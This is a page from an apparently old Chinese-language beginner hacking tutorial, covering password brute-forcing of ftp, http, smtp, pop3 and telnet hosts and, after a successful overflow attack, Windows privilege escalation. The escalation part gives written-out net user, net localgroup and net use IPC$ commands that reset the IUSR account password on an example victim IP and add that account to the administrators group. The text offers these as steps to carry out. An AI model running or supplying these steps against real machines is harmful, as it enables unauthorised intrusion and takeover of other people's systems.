五，密码暴力破解

这是最最原始，也是最最基本的攻击的方式了，利用字典文件或暴力模式，对密码进行探测。费时费力，但若有经验的话，可以缩短这一过程。

具体方法：

1，找一个破解器，有ftp,http,smtp,pop3,telnet等等类型。

2，找到一台相应的主机。

3，设定一番，上路吧！你可以睡觉，可以去machine(就是做作业)，可以去泡妞……就是不要傻等。为什么呢？因为会伤视力的：）怎么倒了一片，起来起来！

4，万一成功了（之所以用这个词，是因为成功率很低的）表明你运气旺，赶紧下线，买彩票去吧^_^
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

大家好，这几天被cgi程序搞得头昏脑胀，主要还是51的错，什么破东西，那么多错误！现在只好暂时借人家的地方用。

这是菜鸟操的最后第二节，说实话我还可以写很多的，但是作业还欠了一大堆：（为什么我没有满舟的狗屎运？算了算了，我不合那种欺世盗名之辈一般见识，开始做操吧！

不知道大家对unicode和溢出攻击是不是熟练了？没有的要加油哦！今天我们来谈谈权限的提升。

在Windows系统中，最高的权限掌握在administrators的手里，在xnix中称为root,我们要完全掌握一台机器，拿到admin是不可或缺的。

首先说说最简单的:system to admin

当我们用溢出攻击成功后，其实我们已经拿到了system权限（具体看每种攻击而可能有所不同）这时我们很容易拿到admin权限。首先看看一下命令：

net user 察看用户表  net user username pass /add(添加密码为pass的用户username)

net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组

net use \\ip\ipc$ "password" /user:username 这是远程连接的命令

假如我们溢出了11.11.22.22，那么这样做吧！

net user （看到了iusr_machinename的用户了，它一般没什么权限的）

net user iusr_machinename cshu （把它的密码设为cshu）

net localgroup administrators iusr_machinename /add（加入administrators组）

这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！

 << 上一页  [11] [12] [13] [14] 下一页